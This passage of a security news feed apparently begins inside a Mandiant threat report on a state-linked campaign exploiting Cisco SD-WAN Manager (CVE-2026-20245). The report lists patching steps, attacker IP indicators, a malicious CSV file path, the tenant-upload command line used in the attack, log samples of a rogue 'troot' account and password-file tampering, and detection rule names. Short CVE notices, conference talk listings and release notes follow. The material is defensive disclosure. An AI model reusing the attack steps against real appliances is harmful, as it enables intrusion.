<p role="presentation"><span>Threat actor-created files in </span><code>/home/admin.</code></p>
</li>
<li aria-level="1">
<p role="presentation"><code>troot</code><span> account in the </span><code>passwd</code><span> and </span><code>shadow</code><span> files.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>vbond_vsmart_tenant_list</code><span>, and if it exists, inspect information about the file. This is likely to check if the original file was restored.</span></p>
</li>
</ul>
<h3><span>Outlook and Implications</span></h3>
<p><span>This campaign underscores the living off the edge paradigm, where threat actors prioritize the compromise of network appliances to bypass traditional security perimeters. As organizations increasingly adopt software-defined networking, the orchestrators managing these environments become primary targets. These devices offer a black box environment for threat actors: they often lack the telemetry required for deep forensic analysis, and their role as a central control plane provides a stealthy platform for persistent, wide-scale access to internal enterprise traffic. For state-sponsored actors, the ability to exploit zero-day vulnerabilities in these platforms remains a premier vector for long-term strategic intelligence collection. Google Threat Intelligence Group (GTIG) has </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-days-exploited-2022"><span>closely</span></a><span> </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends"><span>tracked</span></a><span> </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends"><span>and</span></a><span> </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span>reported</span></a><span> on increased zero-day exploitation of edge devices over the past several years.</span></p>
<h3><span>Remediation and Hardening</span></h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Perform IOC Sweep / Threat Hunting:</strong><span> Collect logs and diagnostic data from SD-WAN devices by executing </span><code>request admin-tech</code><span> command on all control-plane components. Scan these collections for known IOCs and execute threat hunts focused on the TTPs identified in the Detections and Hunting section of this blog post. If true positive hits are observed, perform a full investigation.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Manual Remediation Support:</strong><span> As per Cisco’s guidance, any confirmed indicators of compromise or suspicious activity should be forwarded to </span><a href="https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html" rel="noopener" target="_blank"><span>Cisco Technical Assistance Center (TAC)</span></a><span> for comprehensive review and remediation assistance.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Prioritize Immediate Patching and Upgrades:</strong><span> Organizations must prioritize upgrading Cisco Catalyst SD-WAN Manager to fixed software releases, specifically versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later, to remediate </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"><span>CVE-2026-20245</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Implement Cisco Catalyst SD-WAN Hardening and Logging Guidelines</strong><span>: Organizations should follow the comprehensive security best practices and configuration standards detailed in the </span><a href="https://sec.cloudapps.cisco.com/security/center/resources/Cisco-Catalyst-SD-WAN-HardeningGuide" rel="noopener" target="_blank"><span>Cisco Catalyst SD-WAN Hardening Guide</span></a><span>. This guide provides a robust defense-in-depth framework for securing all SD-WAN components including the management, control, and data planes against unauthorized access.</span></p>
</li>
</ul>
<h3><span>Indicators of Compromise (IOCs)</span></h3>
<p><span>To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a free </span><a href="https://www.virustotal.com/gui/collection/d966161b93100fb8905b9b81bd03e57bbc93f21534acee88999e77798e913d5b/summary" rel="noopener" target="_blank"><span>GTI Collection</span></a><span> for registered users.</span></p>
<h4><span>Network Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>Indicator</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device and exploiting CVE-2026-20245</span></p>
</td>
<td>
<p><code>126.51.108[.]152</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>76.92.245[.]217</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>207.190.37[.]94</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>23.245.7[.]178</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>153.186.231[.]233</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>167.179.79[.]189</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>45.32.38[.]160</code></p>
</td>
</tr>
<tr>
<td>
<p><span>IP address connecting as rogue device</span></p>
</td>
<td>
<p><code>209.137.225[.]101</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>File Indicators</span></h4>
<p><span>Due to the threat actor's extensive anti-forensic cleanup, several files associated with this intrusion were overwritten or deleted. However, forensic remnants of the malicious CSV payload were recovered.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/admin/.orig_vbond_vsmart_tenant_list</code></p>
</td>
<td>
<p><span>Backup configuration file</span></p>
</td>
<td>
<p><span>Not recovered</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/admin/.orig_vbond_vsmart_tenant_list.state</code></p>
</td>
<td>
<p><span>State file</span></p>
</td>
<td>
<p><span>Not recovered</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/admin/.orig_passwd</code></p>
</td>
<td>
<p><span>Backup password file</span></p>
</td>
<td>
<p><span>Not recovered</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/admin/.orig_shadow</code></p>
</td>
<td>
<p><span>Backup password file</span></p>
</td>
<td>
<p><span>Not recovered</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/admin/evil_tenant.csv</code></p>
</td>
<td>
<p><span>Remnant of malicious CSV file exploiting CVE-2026-20245</span></p>
</td>
<td>
<p><code>b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Detections and Hunting</span></h3>
<p><span>Mandiant encourages organizations to conduct proactive threat hunts focused on the tactics, techniques, and procedures (TTPs) outlined in this report to identify activity that may otherwise blend into routine operations. Because certain indicators of compromises may mirror legitimate administrative actions, it is critical to assess these observations against the established network posture to minimize false positives.</span></p>
<p><span>As per Cisco’s guidance, any suspicious activity or confirmed IOCs should be forwarded to the Cisco TAC for comprehensive review and assistance.</span></p>
<h4><span>Unauthorized SSH Connections as </span><code>vmanage-admin</code></h4>
<p><span>Monitor authentication logs (</span><code>/var/log/auth.log</code><span>) for logins originating from unexpected external IP addresses using the vmanage-admin user account.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Jan 01 07:58:00 vManage sshd[20766]: Accepted publickey for vmanage-admin from &lt;Threat Actor IP&gt; port 48373 ssh2: RSA SHA256:&lt;redacted&gt;
Jan 01 08:01:00 vManage sshd[25178]: Accepted keyboard-interactive/pam for admin from &lt;Threat Actor IP&gt; port 60552 ssh2</code></pre>
<p><span><span>Figure 5: SSH from unexpected origins</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Suspicious Password Change Events</span></h4>
<p><span>Audit password changes in </span><code>/var/log/auth.log</code><span> targeting the admin account in quick succession, particularly where credentials are set and subsequently reverted.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Jan 01 08:00:00 vManage usermod[12345]: change user 'admin' password
Jan 01 08:15:00 vManage usermod[12345]: change user 'admin' password</code></pre>
<p><span><span>Figure 6: Password changes</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Defenders should also inspect rollback files present within </span><code>/var/confd/rollback/</code><span> for configuration delta commits targeting user passwords:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code># Created by: vmanage-admin
# Date: 2026-01-01 08:00:00
# Via: netconf
# Type: delta
# Label: 
# Comment: 
# No: 10000
# TransactionId: 12345678
# Hostname: vManage

system {
    aaa {
        user admin {
password &lt;redacted&gt;;
        }
     }
 }</code></pre>
<p><span><span>Figure 7: Rollback files</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Suspicious Execution of the <code>su</code> Command</span></h4>
<p><span>Audit terminal command history and system logs (</span><code>/var/log/auth.log</code><span>) for successful switch user (</span><code>su</code><span>) executions from the admin account to unauthorized accounts (e.g., </span><code>troot</code><span>).</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Jan 01 08:03:00 vManage su[24289]: Successful su for troot by admin</code></pre>
<p><span><span>Figure 8: </span><code>su</code><span> logins</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>Exploitation of CVE-2026-20245</span></h4>
<p><span>Monitor script logs (</span><code>/var/log/scripts.log</code><span>) for execution anomalies involving unauthorized execution of </span><code>vconfd_script_upload_tenant_list.sh</code><span>.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Jan 01 08:01:05 vManage vScript: Tenant list upload per vsmart serial number: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/evil_tenant.csv vpn 0
Jan 01 08:01:05 vManage vScript: uploading tenant list via VPN 0 true
Jan 01 08:01:05 vManage vScript: Copying ... /home/admin/evil_tenant.csv via VPN 0
Jan 01 08:01:05 vManage vScript: Successfully loaded the tenant placement file</code></pre>
<p><span><span>Figure 9: Execution anomalies</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Defenders can also query active command execution history using show history within the Viptela CLI for the specific administrative upload commands:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>01-01 08:01:05 -- request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0</code></pre>
<p><span><span>Figure 10: Command execution</span></span></p></div>
<div class="block-paragraph_advanced"><h3><span>Google Security Operations (SecOps)</span></h3>
<p><span>Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Privileged Account Append to Passwd Database</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Grep Privileged User Account Discovery in Passwd or Shadow</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Hidden Backup of Sensitive System Files</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Copy from Usr Share to User Hidden Directory</span></p>
</li>
</ul>
<h3><span>Acknowledgements</span></h3>
<p><span>Mandiant would like to thank the Cisco Product Security Incident Response Team (PSIRT) for their collaboration and partnership throughout the coordinated disclosure process.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50178 | angular Angular.ng-template up to 21.2.3 Language Service client/src/client.ts cross site scripting (Nessus ID 322254)]]></title>
<description><![CDATA[A vulnerability has been found in angular Angular.ng-template up to 21.2.3 and classified as problematic. Affected by this issue is some unknown functionality of the file client/src/client.ts of the component Language Service. The manipulation leads to cross site scripting.

This vulnerability is...]]></description>
<link>https://tsecurity.de/de/3620541/sicherheitsluecken/cve-2026-50178-angular-angularng-template-up-to-2123-language-service-clientsrcclientts-cross-site-scripting-nessus-id-322254/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620541/sicherheitsluecken/cve-2026-50178-angular-angularng-template-up-to-2123-language-service-clientsrcclientts-cross-site-scripting-nessus-id-322254/</guid>
<pubDate>Wed, 24 Jun 2026 09:37:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/angular:angular">angular Angular.ng-template up to 21.2.3</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>client/src/client.ts</em> of the component <em>Language Service</em>. The manipulation leads to cross site scripting.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-50178">CVE-2026-50178</a>. Remote exploitation of the attack is possible. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 EuroLLVM - Creating a runtime using the LLVM_ENABLE_RUNTIMES system]]></title>
<description><![CDATA[Author: LLVM - Bewertung: 0x - Views:0 2026 EuroLLVM Developers' Meeting
https://llvm.org/devmtg/2026-04/
------
Title: Creating a runtime using the LLVM_ENABLE_RUNTIMES system
Speaker: Michael Kruse
------
Slides:  https://llvm.org/devmtg/2026-04/slides/tutorial/tutorial_kruse.pdf
-----
Few will...]]></description>
<link>https://tsecurity.de/de/3620039/it-security-video/2026-eurollvm-creating-a-runtime-using-the-llvmenableruntimes-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620039/it-security-video/2026-eurollvm-creating-a-runtime-using-the-llvmenableruntimes-system/</guid>
<pubDate>Wed, 24 Jun 2026 04:03:33 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: LLVM - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/eVRotqOrHrw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>2026 EuroLLVM Developers' Meeting<br />
https://llvm.org/devmtg/2026-04/<br />
------<br />
Title: Creating a runtime using the LLVM_ENABLE_RUNTIMES system<br />
Speaker: Michael Kruse<br />
------<br />
Slides:  https://llvm.org/devmtg/2026-04/slides/tutorial/tutorial_kruse.pdf<br />
-----<br />
Few will need to create a new runtime library for LLVM, and it is not actually the goal of this tutorial. We intend to illustrate the inner workings and conventions of the LLVM build system. Currently, our runtimes (compiler-rt, libc++, openmp, ...) build code is still mostly based on the patterns from when each runtime had its own SVN repository, had to be able to be built independently, and therefore all runtimes implement their own boilerplate. Eventually, they should converge instead of each runtime introducing their own solutions to their build problems.<br />
<br />
In addition to an introduction to the history of the LLVM_ENABLE_RUNTIMES system and its rationale, we create a template runtime from scratch covering: registering with the LLVM build system, building library artifacts, build modes, CMake cache files, installation, shared and static libraries, regression testing, unittests, Sphinx and Doxygen docs, cross-compilation, accelerator offloading, and depending on other LLVM libraries.<br />
-----<br />
Videos Edited by Bash Films: http://www.BashFilms.com<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[Hi, everyone! We've just released Chrome 149 (149.0.7827.197) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3619977/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619977/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Wed, 24 Jun 2026 03:37:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi, everyone! We've just released <b>Chrome 149 (149.0.7827.197)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.159..149.0.7827.197?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0482630350.html"> Desktop releases</a> (Windows &amp; Mac: 149.0.7827.155/156, Linux: 149.0.7872.155) unless otherwise noted.</div><div><div><br></div><div><div>Harry Souders</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 EuroLLVM - CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability]]></title>
<description><![CDATA[Author: LLVM - Bewertung: 0x - Views:1 2026 EuroLLVM Developers' Meeting
https://llvm.org/devmtg/2026-04/
------
Title: CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability
Speaker: Aaron Jomy
------
Slides:  https://llvm.org/devmtg/2026-04/slides/technical_talk/technic...]]></description>
<link>https://tsecurity.de/de/3619971/it-security-video/2026-eurollvm-cppinterop-interactive-c-as-a-service-and-advanced-language-interoperability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619971/it-security-video/2026-eurollvm-cppinterop-interactive-c-as-a-service-and-advanced-language-interoperability/</guid>
<pubDate>Wed, 24 Jun 2026 03:33:05 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: LLVM - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/GuodsU3VO8Q?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>2026 EuroLLVM Developers' Meeting<br />
https://llvm.org/devmtg/2026-04/<br />
------<br />
Title: CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability<br />
Speaker: Aaron Jomy<br />
------<br />
Slides:  https://llvm.org/devmtg/2026-04/slides/technical_talk/technical_talk_jomy.pdf<br />
-----<br />
CppInterOp provides compiler-as-a-service capabilities using Clang-REPL, enabling dynamic languages to interoperate with C++. This talk covers its technical architecture, including runtime template instantiation, C++ overload resolution, and JitCall - a lightweight runtime wrapper generator. We demonstrate how CppInterOp's API, built on Clang's AST, enables practical Python-C++ interoperability, including use cases like invoking CUDA kernels from Python and cross-language inheritance between Python and C++ classes.<br />
-----<br />
Videos Edited by Bash Films: http://www.BashFilms.com<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 EuroLLVM - CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability]]></title>
<description><![CDATA[Author: LLVM - Bewertung: 0x - Views:4 2026 EuroLLVM Developers' Meeting
https://llvm.org/devmtg/2026-04/
------
Title: CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability
Speaker: Aaron Jomy
------
Slides:  https://llvm.org/devmtg/2026-04/slides/technical_talk/technic...]]></description>
<link>https://tsecurity.de/de/3619964/it-security-video/2026-eurollvm-cppinterop-interactive-c-as-a-service-and-advanced-language-interoperability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619964/it-security-video/2026-eurollvm-cppinterop-interactive-c-as-a-service-and-advanced-language-interoperability/</guid>
<pubDate>Wed, 24 Jun 2026 03:17:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: LLVM - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/-xbcgdO0g2Y?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>2026 EuroLLVM Developers' Meeting<br />
https://llvm.org/devmtg/2026-04/<br />
------<br />
Title: CppInterOp: Interactive C++ as a Service and Advanced Language Interoperability<br />
Speaker: Aaron Jomy<br />
------<br />
Slides:  https://llvm.org/devmtg/2026-04/slides/technical_talk/technical_talk_jomy.pdf<br />
-----<br />
CppInterOp provides compiler-as-a-service capabilities using Clang-REPL, enabling dynamic languages to interoperate with C++. This talk covers its technical architecture, including runtime template instantiation, C++ overload resolution, and JitCall - a lightweight runtime wrapper generator. We demonstrate how CppInterOp's API, built on Clang's AST, enables practical Python-C++ interoperability, including use cases like invoking CUDA kernels from Python and cross-language inheritance between Python and C++ classes.<br />
-----<br />
Videos Edited by Bash Films: http://www.BashFilms.com<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-9029 | Grafana OSS 12.4.0 Template String sanitizeTextPanelContent cross site scripting]]></title>
<description><![CDATA[A vulnerability has been found in Grafana OSS 12.4.0 and classified as problematic. The affected element is the function sanitizeTextPanelContent of the component Template String Handler. This manipulation causes cross site scripting.

This vulnerability is tracked as CVE-2026-9029. The attack is...]]></description>
<link>https://tsecurity.de/de/3619866/sicherheitsluecken/cve-2026-9029-grafana-oss-1240-template-string-sanitizetextpanelcontent-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619866/sicherheitsluecken/cve-2026-9029-grafana-oss-1240-template-string-sanitizetextpanelcontent-cross-site-scripting/</guid>
<pubDate>Wed, 24 Jun 2026 01:23:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/grafana:oss">Grafana OSS 12.4.0</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is the function <code>sanitizeTextPanelContent</code> of the component <em>Template String Handler</em>. This manipulation causes cross site scripting.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-9029">CVE-2026-9029</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[2026-06-23, Version 24.18.0 'Krypton' (LTS), @richardlau prepared by @sxa]]></title>
<description><![CDATA[Notable Changes

[e07e7a31e1] - crypto: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) #63527
[44c8ebcbd6] - http: avoid stream listeners on idle agent sockets (Matteo Collina) #64004
[d3ef4122ee] - (SEMVER-MINOR) buffer: increase Buffer.poolSize default to 64 KiB (Matteo Collina) #...]]></description>
<link>https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</guid>
<pubDate>Wed, 24 Jun 2026 01:16:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ff36e40f0"><code>9ff36e40f0</code></a>] - <strong>build</strong>: add --enable-all-experimentals build flag (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/62755" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62755/hovercard">#62755</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7c22ee23aa"><code>7c22ee23aa</code></a>] - <strong>build</strong>: def <code>NODE_USE_NODE_CODE_CACHE</code> only used in node_mksnapshot (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63588/hovercard">#63588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2551abdb4a"><code>2551abdb4a</code></a>] - <strong>build,win</strong>: enable x64 PGO (Stefan Stojanovic) <a href="https://github.com/nodejs/node/pull/62761" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62761/hovercard">#62761</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e8a55ce9b1"><code>e8a55ce9b1</code></a>] - <strong>crypto</strong>: strengthen argument CHECKs in TurboSHAKE (Tobias Nießen) <a href="https://github.com/nodejs/node/pull/62763" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62763/hovercard">#62763</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae61cd68f3"><code>ae61cd68f3</code></a>] - <strong>crypto</strong>: harden WebCrypto against prototype pollution (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d05a1d396"><code>3d05a1d396</code></a>] - <strong>crypto</strong>: pass CryptoKey handles to KDF jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f9d10a3f6b"><code>f9d10a3f6b</code></a>] - <strong>crypto</strong>: remove async from WebCrypto methods (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e431d93e9e"><code>e431d93e9e</code></a>] - <strong>crypto</strong>: add WebCrypto CryptoJob mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
